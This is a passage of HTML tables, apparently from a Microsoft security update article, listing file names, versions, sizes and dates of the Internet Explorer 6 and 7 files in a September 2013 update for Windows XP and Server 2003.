class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">713,216</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">854,016</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">45,568</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">08:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">672,256</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported Itanium-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">2,543,104</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">1,009,152</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">640,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">997,888</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">154,112</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">9,467,904</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,531,904</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,845,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">116,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">3,700,224</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">205,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">50,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,639,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">2,425,344</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,708,032</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wbrowseui.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,033,728</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">361,472</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">209,920</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">253,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">3,163,136</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">459,264</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">537,600</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wshdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,520,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wtdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">713,216</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">854,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ww03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">45,568</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">672,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported x64-based versions of Windows Server 2003 and Windows XP Professional</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,605,120</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">562,176</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">332,288</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">566,784</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">96,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">370,176</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">6,064,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">929,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">900,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">64,000</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">2,460,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">94,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">40,960</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,107,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,428,480</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">46,080</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,196,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wbrowseui.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,033,728</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">361,472</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5226</td><td class=\"sbody-td\">209,920</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">253,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">3,163,136</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">459,264</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">537,600</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wshdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">1,520,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wtdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">713,216</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">854,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ww03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5226</td><td class=\"sbody-td\">45,568</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">6.0.3790.5226</td><td class=\"sbody-td\">672,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 7</h3><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported 32-bit versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td 